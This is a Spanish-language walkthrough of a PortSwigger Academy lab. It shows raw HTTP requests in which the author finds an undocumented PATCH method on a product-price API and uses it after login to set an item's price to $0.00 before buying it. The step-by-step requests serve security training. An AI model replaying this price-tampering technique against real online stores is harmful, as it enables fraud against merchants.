Lab #3: Finding and exploiting an unused API endpoint

https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint

Primero analizamos el trafico al interactuar con un producto se genera la siguiente peticion:

GET /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

Y esto responde:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 98

{"price":"$15.45","message":"Buy quick, we are low on stock! 5 purchased in the last 42 minutes!"}

Si modificamos el metodo utilizado para la peticion:

OPTIONS /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

Esto responde asi:

HTTP/2 405 Method Not Allowed
Allow: GET, PATCH
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"

Gracias a la peticion con OPTIONS se identifica que Allow: GET, PATCH

Se identifica la necesidad de una autenticacion debido al error luego de interactuar con el metodo PATCH.

PATCH /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

Lo anteriro responde asi:

HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
Set-Cookie: session=VO2gWYDu5GJLUNPoqfG0VRoRiyGokldK; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"

Realizamos login y luego enviamos nuevamente la peticion:

PATCH /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Cookie: session=xDsx2QXEtAEA5PeYCKRf1cijXpaQfNkf
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

Y ahora sale un nuevo error que dice:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 93

{"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}

Teniendo en cuenta el error modificamos la peticion:

PATCH /api/products/3/price HTTP/2
Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net
Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 2

{}

Y sale este error:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 77

{"type":"ClientError","code":400,"error":"'price' parameter missing in body"}

Teniendo en cuenta el error modificamos la peticion:

PATCH /api/products/3/price HTTP/2
Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net
Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 11

{"price":0}

Esta peticion permitio modificar el precio del producto:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 17

{"price":"$0.00"}

Y compramos el producto:

AnteriorLab #2: Exploiting server-side parameter pollution in a query string SiguienteLab #4: Exploiting a mass assignment vulnerability

Última actualización hace 3 meses

¿Te fue útil?

GET /api/products/3/price HTTP/2 Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3 Accept-Encoding: gzip, deflate, br Priority: u=1, i

HTTP/2 200 OK Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 98 {"price":"$15.45","message":"Buy quick, we are low on stock! 5 purchased in the last 42 minutes!"}

OPTIONS /api/products/3/price HTTP/2 Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3 Accept-Encoding: gzip, deflate, br Priority: u=1, i

PATCH /api/products/3/price HTTP/2 Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3 Accept-Encoding: gzip, deflate, br Priority: u=1, i

HTTP/2 401 Unauthorized Content-Type: application/json; charset=utf-8 Set-Cookie: session=VO2gWYDu5GJLUNPoqfG0VRoRiyGokldK; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 14 "Unauthorized"

PATCH /api/products/3/price HTTP/2 Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net Cookie: session=xDsx2QXEtAEA5PeYCKRf1cijXpaQfNkf Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3 Accept-Encoding: gzip, deflate, br Priority: u=1, i

HTTP/2 400 Bad Request Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 93 {"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}

PATCH /api/products/3/price HTTP/2 Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD Sec-Ch-Ua-Platform: "Windows" Accept-Language: es-CO,es;q=0.9 Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Content-Type: application/json Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3 Accept-Encoding: gzip, deflate, br Priority: u=1, i Content-Length: 2 {}